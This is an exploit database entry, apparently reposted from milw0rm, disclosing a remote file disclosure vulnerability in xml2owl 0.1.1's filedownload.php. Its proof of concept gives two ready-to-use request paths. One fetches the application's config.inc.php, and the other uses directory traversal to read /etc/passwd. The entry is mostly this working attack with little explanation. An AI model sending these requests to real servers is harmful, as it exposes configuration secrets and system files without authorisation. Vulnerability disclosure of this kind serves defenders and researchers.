xml2owl 0.1.1 - filedownload.php Remote File Disclosure

2007-12-13T00:00:00
ID EXPLOITPACK:B8C4DE96E8CA57E4963B7B844EA8FE45
Type exploitpack
Reporter GoLd_M
Modified 2007-12-13T00:00:00

Description

xml2owl 0.1.1 - filedownload.php Remote File Disclosure

                                        
                                            xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability
D.s : http://surfnet.dl.sourceforge.net/sourceforge/xml2owl/xml2owl-0.1.1.tar.bz2
POC :
     /xml2owl-0.1.1/filedownload.php?file=config.inc.php
     /xml2owl-0.1.1/filedownload.php?file=../../../../../../../etc/passwd

# milw0rm.com [2007-12-13]